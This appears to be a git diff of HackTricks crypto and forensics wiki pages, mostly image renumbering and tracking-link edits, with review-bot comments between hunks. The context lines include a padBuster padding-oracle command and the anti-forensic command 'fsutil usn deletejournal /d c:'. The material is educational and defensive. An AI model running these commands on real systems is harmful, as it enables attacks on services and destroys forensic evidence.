-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=certificates) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=certificates" %}
diff --git a/crypto-and-stego/cryptographic-algorithms/README.md b/crypto-and-stego/cryptographic-algorithms/README.md
index 09008cb33..96cb122b1 100644
--- a/crypto-and-stego/cryptographic-algorithms/README.md
+++ b/crypto-and-stego/cryptographic-algorithms/README.md
@@ -26,7 +26,7 @@ If you ends in a code **using shift rights and lefts, xors and several arithmeti
If this function is used, you can find which **algorithm is being used** checking the value of the second parameter:
-![](<../../.gitbook/assets/image (153).png>)
+![](<../../.gitbook/assets/image (156).png>)
Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
@@ -42,7 +42,7 @@ From [the docs](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-
Initiates the hashing of a stream of data. If this function is used, you can find which **algorithm is being used** checking the value of the second parameter:
-![](<../../.gitbook/assets/image (546).png>)
+![](<../../.gitbook/assets/image (549).png>)
\
Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
@@ -51,11 +51,11 @@ Check here the table of possible algorithms and their assigned values: [https://
Sometimes it's really easy to identify an algorithm thanks to the fact that it needs to use a special and unique value.
-![](<../../.gitbook/assets/image (830).png>)
+![](<../../.gitbook/assets/image (833).png>)
If you search for the first constant in Google this is what you get:
-![](<../../.gitbook/assets/image (526).png>)
+![](<../../.gitbook/assets/image (529).png>)
Therefore, you can assume that the decompiled function is a **sha256 calculator.**\
You can search any of the other constants and you will obtain (probably) the same result.
@@ -65,7 +65,7 @@ You can search any of the other constants and you will obtain (probably) the sam
If the code doesn't have any significant constant it may be **loading information from the .data section**.\
You can access that data, **group the first dword** and search for it in google as we have done in the section before:
-![](<../../.gitbook/assets/image (528).png>)
+![](<../../.gitbook/assets/image (531).png>)
In this case, if you look for **0xA56363C6** you can find that it's related to the **tables of the AES algorithm**.
@@ -85,15 +85,15 @@ It's composed of 3 main parts:
### **Initialization stage/Substitution Box:** (Note the number 256 used as counter and how a 0 is written in each place of the 256 chars)
-![](<../../.gitbook/assets/image (581).png>)
+![](<../../.gitbook/assets/image (584).png>)
### **Scrambling Stage:**
-![](<../../.gitbook/assets/image (832).png>)
+![](<../../.gitbook/assets/image (835).png>)
### **XOR Stage:**
-![](<../../.gitbook/assets/image (901).png>)
+![](<../../.gitbook/assets/image (904).png>)
## **AES (Symmetric Crypt)**
@@ -105,7 +105,7 @@ It's composed of 3 main parts:
### SBox constants
-![](<../../.gitbook/assets/image (205).png>)
+![](<../../.gitbook/assets/image (208).png>)
## Serpent **(Symmetric Crypt)**
@@ -119,11 +119,11 @@ It's composed of 3 main parts:
In the following image notice how the constant **0x9E3779B9** is used (note that this constant is also used by other crypto algorithms like **TEA** -Tiny Encryption Algorithm).\
Also note the **size of the loop** (**132**) and the **number of XOR operations** in the **disassembly** instructions and in the **code** example:
-![](<../../.gitbook/assets/image (544).png>)
+![](<../../.gitbook/assets/image (547).png>)
As it was mentioned before, this code can be visualized inside any decompiler as a **very long function** as there **aren't jumps** inside of it. The decompiled code can look like the following:
-![](<../../.gitbook/assets/image (510).png>)
+![](<../../.gitbook/assets/image (513).png>)
Therefore, it's possible to identify this algorithm checking the **magic number** and the **initial XORs**, seeing a **very long function** and **comparing** some **instructions** of the long function **with an implementation** (like the shift left by 7 and the rotate left by 22).
@@ -137,7 +137,7 @@ Therefore, it's possible to identify this algorithm checking the **magic number*
### Identifying by comparisons
-![](<../../.gitbook/assets/image (1110).png>)
+![](<../../.gitbook/assets/image (1113).png>)
* In line 11 (left) there is a `+7) >> 3` which is the same as in line 35 (right): `+7) / 8`
* Line 12 (left) is checking if `modulus_len < 0x040` and in line 36 (right) it's checking if `inputLen+11 > modulusLen`
@@ -155,7 +155,7 @@ Therefore, it's possible to identify this algorithm checking the **magic number*
You can identify both of them checking the constants. Note that the sha\_init has 1 constant that MD5 doesn't have:
-![](<../../.gitbook/assets/image (403).png>)
+![](<../../.gitbook/assets/image (406).png>)
**MD5 Transform**
@@ -172,11 +172,11 @@ Note the use of more constants
Check **lookup table constants**:
-![](<../../.gitbook/assets/image (505).png>)
+![](<../../.gitbook/assets/image (508).png>)
A CRC hash algorithm looks like:
-![](<../../.gitbook/assets/image (387).png>)
+![](<../../.gitbook/assets/image (391).png>)
## APLib (Compression)
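Review bot: the CRC screenshot under "A CRC hash algorithm looks like" moves from `image (387).png` to `image (391).png`, a shift of 4, while every other reference in this file (505 to 508 in this same hunk, 528 to 531, 581 to 584 and so on) shifts by 3. The same off-by-one pattern shows up later in this commit at 306 to 310 and 635 to 639. Please confirm these three references point at the intended images, since a wrong mapping renders without any error and only shows an unrelated screenshot.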
@@ -193,7 +193,7 @@ The graph is quiet large:
Check **3 comparisons to recognise it**:
-![](<../../.gitbook/assets/image (427).png>)
+![](<../../.gitbook/assets/image (430).png>)
diff --git a/crypto-and-stego/esoteric-languages.md b/crypto-and-stego/esoteric-languages.md
index 7e026fa79..dd7b853c4 100644
--- a/crypto-and-stego/esoteric-languages.md
+++ b/crypto-and-stego/esoteric-languages.md
@@ -27,7 +27,7 @@ Check that wiki to search more esotreic languages
## npiet
-![](<../.gitbook/assets/image (688).png>)
+![](<../.gitbook/assets/image (691).png>)
[https://www.bertnase.de/npiet/npiet-execute.php](https://www.bertnase.de/npiet/npiet-execute.php)
diff --git a/crypto-and-stego/hash-length-extension-attack.md b/crypto-and-stego/hash-length-extension-attack.md
index ba17ef3ea..fb60efadc 100644
--- a/crypto-and-stego/hash-length-extension-attack.md
+++ b/crypto-and-stego/hash-length-extension-attack.md
@@ -1,4 +1,4 @@
-
+# Hash Length Extension Attack
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
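Review bot: the replaced Twitter line now escapes the underscore inside the link destination as well as the link text (`https://twitter.com/hacktricks\_live`), while the Trickest links changed in this same commit go the other way and drop the `\_` and `\&` escapes from their URLs. Pick one convention for URLs. Escaping only the visible text and leaving the destination as `https://twitter.com/hacktricks_live` keeps the link correct for renderers and scrapers that do not process backslash escapes in destinations. The same line is changed again in the footer of this file and in dnscat-exfiltration.md.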
@@ -26,10 +26,9 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
-
-# Summary of the attack
+## Summary of the attack
Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know:
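Review bot: the context sentence under the re-levelled "Summary of the attack" heading says the server signs by "appending a secret to some known clear text data", but the steps later in this file give the hashed input as "secret" + "data" + "padding" + "append", with the secret first. Since this section is being touched, consider rewording to "prepending a secret" so the description matches the construction the rest of the page walks through.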
@@ -42,7 +41,7 @@ Imagine a server which is **signing** some **data** by **appending** a **secret*
Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previos data + appended data**.
-## How?
+### How?
Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** (state), they **add the next block of data** and **hash it**.
@@ -54,17 +53,17 @@ If an attacker wants to append the string "append" he can:
* Append the string "append"
* Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"**
-## **Tool**
+### **Tool**
{% embed url="https://github.com/iagox86/hash_extender" %}
-## References
+### References
You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
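Review bot: demoting `## **Tool**` and `## References` to `###` nests both of them under "Summary of the attack", alongside "How?". Tool and References are not part of the summary, so they would read better as `##` siblings of it under the new `#` title. While on the References line, "good explained" should be "well explained".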
@@ -83,9 +82,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
diff --git a/crypto-and-stego/padding-oracle-priv.md b/crypto-and-stego/padding-oracle-priv.md
index f1678ff0f..0dad32c30 100644
--- a/crypto-and-stego/padding-oracle-priv.md
+++ b/crypto-and-stego/padding-oracle-priv.md
@@ -80,7 +80,7 @@ perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon
In **summary**, you can start decrypting the encrypted data by guessing the correct values that can be used to create all the **different paddings**. Then, the padding oracle attack will start decrypting bytes from the end to the start by guessing which will be the correct value that **creates a padding of 1, 2, 3, etc**.
-![](<../.gitbook/assets/image (558).png>)
+![](<../.gitbook/assets/image (561).png>)
Imagine you have some encrypted text that occupies **2 blocks** formed by the bytes from **E0 to E15**.\
In order to **decrypt** the **last** **block** (**E8** to **E15**), the whole block passes through the "block cipher decryption" generating the **intermediary bytes I0 to I15**.\
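Review bot: the context below the updated image says the ciphertext is 2 blocks covering E0 to E15 and that decrypting the last block (E8 to E15) produces intermediary bytes I0 to I15. Passing only E8 to E15 through the block cipher yields eight intermediary bytes, so either this should read I8 to I15 or the sentence should say both blocks are decrypted. Worth checking against the relinked figure, `image (561).png`, so the text and the diagram use the same labels.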
diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md
index 1db2b7f7c..d102c9df9 100644
--- a/forensics/basic-forensic-methodology/anti-forensic-techniques.md
+++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -167,7 +167,7 @@ It's also possible to modify the configuration of which files are going to be co
* `fsutil usn deletejournal /d c:`
-
+
{% embed url="https://websec.nl/" %}
diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md
index 113e63371..2f6657be0 100644
--- a/forensics/basic-forensic-methodology/windows-forensics/README.md
+++ b/forensics/basic-forensic-methodology/windows-forensics/README.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -514,7 +514,7 @@ EventID 6005 indicates system startup, while EventID 6006 marks shutdown.
Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis.
-
+
{% embed url="https://websec.nl/" %}
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md b/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md
index 2e1d117e5..f9e11e395 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md
@@ -31,7 +31,7 @@ This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION
The **USN Journal** (Update Sequence Number Journal) is a feature of the NTFS (Windows NT file system) that keeps track of volume changes. The [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) tool allows for the examination of these changes.
-![](<../../.gitbook/assets/image (798).png>)
+![](<../../.gitbook/assets/image (801).png>)
The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file.
@@ -39,13 +39,13 @@ The previous image is the **output** shown by the **tool** where it can be obser
**All metadata changes to a file system are logged** in a process known as [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead\_logging). The logged metadata is kept in a file named `**$LogFile**`, located in the root directory of an NTFS file system. Tools such as [LogFileParser](https://github.com/jschicht/LogFileParser) can be used to parse this file and identify changes.
-![](<../../.gitbook/assets/image (134).png>)
+![](<../../.gitbook/assets/image (137).png>)
Again, in the output of the tool it's possible to see that **some changes were performed**.
Using the same tool it's possible to identify to **which time the timestamps were modified**:
-![](<../../.gitbook/assets/image (1086).png>)
+![](<../../.gitbook/assets/image (1089).png>)
* CTIME: File's creation time
* ATIME: File's modification time
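Review bot: in the context paragraph of this hunk the file name is written with the bold markers inside the code span, so the asterisks render literally around `$LogFile`. Moving the bold outside the backticks fixes it. The Wikipedia link on the same line also carries `\_` inside its destination (`Write-ahead\_logging`), which is worth normalising along with the other URL escapes touched in this commit.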
@@ -70,7 +70,7 @@ NFTS uses a cluster and the minimum information size. That means that if a file
There are tools like slacker that allow hiding data in this "hidden" space. However, an analysis of the `$logfile` and `$usnjrnl` can show that some data was added:
-![](<../../.gitbook/assets/image (1057).png>)
+![](<../../.gitbook/assets/image (1060).png>)
Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this kind of tool can save the content obfuscated or even encrypted.
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
index fabb1028f..f9df47842 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
@@ -12,7 +12,7 @@
-
+
{% embed url="https://websec.nl/" %}
@@ -124,7 +124,7 @@ Note that sector size is **512** and start is **2048**. Then mount the image lik
mount disk.img /mnt -o ro,offset=$((2048*512))
```
-
+
{% embed url="https://websec.nl/" %}
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md b/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md
index e6988ba67..2ffe45b11 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md
@@ -1,12 +1,12 @@
# Linux Forensics
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %}
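Review bot: this three-line Trickest block is edited identically in five separate hunks of linux-forensics.md, with `utm_content=linux-forensics` hard-coded each time and `utm_medium=text` on the link versus `utm_medium=banner` on the embed. Consider moving the block to a single include or reusable snippet so the next tracking change is one edit, and so a missed copy cannot leave mixed parameters in one page.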
@@ -163,13 +163,13 @@ icat -i raw -f ext4 disk.img 16
ThisisTheMasterSecret
```
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %}
## Search for known Malware
@@ -213,13 +213,13 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not"
find / -type f -executable | grep
```
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %}
## Recover Deleted Running Binaries
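Review bot: the code block this hunk sits under has two commands that will not run as written. The hunk header shows `find /sbin/ –exec rpm -qf {} \;` with an en dash in front of `exec` instead of a hyphen, and the context line `find / -type f -executable | grep` has no pattern after `grep`. Since these are copy-and-paste commands for triage on a suspect host, please fix the dash and restore or placeholder the missing pattern in this change.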
@@ -357,13 +357,13 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %}
## Review User Accounts and Logon Activities
@@ -456,10 +456,10 @@ Do you work in a **cybersecurity company**? Do you want to see your **company ad
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %}
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md
index 927e4ec43..15e14a1b1 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md
@@ -32,17 +32,17 @@ Start **searching** for **malware** inside the pcap. Use the **tools** mentioned
When the dump is small (just some KB, maybe a few MB) then it's probably a mini dump crash report and not a memory dump.
-![](<../../../.gitbook/assets/image (529).png>)
+![](<../../../.gitbook/assets/image (532).png>)
If you have Visual Studio installed, you can open this file and bind some basic information like process name, architecture, exception info and modules being executed:
-![](<../../../.gitbook/assets/image (260).png>)
+![](<../../../.gitbook/assets/image (263).png>)
You can also load the exception and see the decompiled instructions
-![](<../../../.gitbook/assets/image (139).png>)
+![](<../../../.gitbook/assets/image (142).png>)
-![](<../../../.gitbook/assets/image (607).png>)
+![](<../../../.gitbook/assets/image (610).png>)
Anyway, Visual Studio isn't the best tool to perform an analysis of the depth of the dump.
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md
index 3c38bcd38..f17b8e050 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md
@@ -25,13 +25,13 @@ It's allocated in the **first sector of the disk after the 446B of the boot code
It allows up to **4 partitions** (at most **just 1** can be active/**bootable**). However, if you need more partitions you can use **extended partitions**. The **final byte** of this first sector is the boot record signature **0x55AA**. Only one partition can be marked as active.\
MBR allows **max 2.2TB**.
-![](<../../../.gitbook/assets/image (347).png>)
+![](<../../../.gitbook/assets/image (350).png>)
-![](<../../../.gitbook/assets/image (301).png>)
+![](<../../../.gitbook/assets/image (304).png>)
From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Signature** (if Windows is used). The logical drive letter of the hard disk depends on the Windows Disk Signature. Changing this signature could prevent Windows from booting (tool: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**.
-![](<../../../.gitbook/assets/image (306).png>)
+![](<../../../.gitbook/assets/image (310).png>)
**Format**
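Review bot: the context paragraph above the relinked images says the "final byte" of the first sector is the boot record signature 0x55AA, but 0x55AA is a two-byte value, so this should read "final two bytes". The same paragraph also states twice that only one partition can be active. In this hunk the third image moves from 306 to 310 while the first two move by 3 (347 to 350, 301 to 304), so please confirm the Windows Disk Signature screenshot is the one intended.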
@@ -93,7 +93,7 @@ The GUID Partition Table, known as GPT, is favored for its enhanced capabilities
* GPT maintains backward compatibility through a protective MBR. This feature resides in the legacy MBR space but is designed to prevent older MBR-based utilities from mistakenly overwriting GPT disks, hence safeguarding the data integrity on GPT-formatted disks.
-![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID\_Partition\_Table\_Scheme.svg/800px-GUID\_Partition\_Table\_Scheme.svg.png](<../../../.gitbook/assets/image (1059).png>)
+![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID\_Partition\_Table\_Scheme.svg/800px-GUID\_Partition\_Table\_Scheme.svg.png](<../../../.gitbook/assets/image (1062).png>)
**Hybrid MBR (LBA 0 + GPT)**
@@ -139,7 +139,7 @@ The partition table header defines the usable blocks on the disk. It also define
**Partitions Types**
-![](<../../../.gitbook/assets/image (80).png>)
+![](<../../../.gitbook/assets/image (83).png>)
More partition types in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
@@ -147,7 +147,7 @@ More partition types in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](h
After mounting the forensics image with [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), you can inspect the first sector using the Windows tool [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In the following image an **MBR** was detected on the **sector 0** and interpreted:
-![](<../../../.gitbook/assets/image (351).png>)
+![](<../../../.gitbook/assets/image (354).png>)
If it was a **GPT table instead of an MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty).
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
index 696f88791..56403ef5a 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
@@ -80,7 +80,7 @@ You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://
It comes with GUI and CLI versions. You can select the **file-types** you want PhotoRec to search for.
-![](<../../../.gitbook/assets/image (239).png>)
+![](<../../../.gitbook/assets/image (242).png>)
### binvis
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
index af312de75..ce8a27b9f 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
@@ -1,4 +1,4 @@
-
+# DNSCat pcap analysis
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content.
@@ -54,7 +54,6 @@ for p in rdpcap('ch21.pcap'):
For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
-
There is a script that works with Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
```
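Review bot: removing the blank line before "There is a script that works with Python3" joins that sentence to the preceding paragraph of reference links, and the protocol.md line above it has no trailing `\`, so the two will run together on one rendered line. Keep the blank line or add the line break. The closing code fence that follows this sentence also looks unbalanced in the visible context and is worth checking in the rendered page.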
@@ -70,9 +69,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
index 56c29d232..8d58f5f07 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
If you have a pcap containing the communication via USB of a keyboard like the following one:
-![](<../../../.gitbook/assets/image (959).png>)
+![](<../../../.gitbook/assets/image (962).png>)
